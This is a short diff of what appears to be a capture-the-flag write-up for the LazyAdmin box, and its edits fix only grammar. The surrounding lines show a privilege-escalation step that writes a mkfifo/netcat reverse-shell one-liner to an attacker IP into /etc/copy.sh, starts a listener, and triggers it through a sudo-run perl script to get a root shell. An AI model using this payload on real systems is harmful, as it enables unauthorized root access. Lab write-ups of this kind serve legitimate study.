blazegit/blazegit.github.io/_posts/2022-05-27-LazyAdmin.md

 echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.17.26.231 5554 >/tmp/f" > /etc/copy.sh
 ```

-and now we execute it with sudo, so we'll have a root shell (remember have the listener ready with the correct port, this case 5554)
+and now we execute it with sudo, so we'll have a root shell (remember to have the listener ready with the correct port, this case 5554)

 in your local machine:
 ```terminal
 nc -lvnp 5554
 ```

-in the victims machine:
+in the victim's machine:
 ```terminal
 sudo /usr/bin/perl /home/itguy/backup.pl
 ```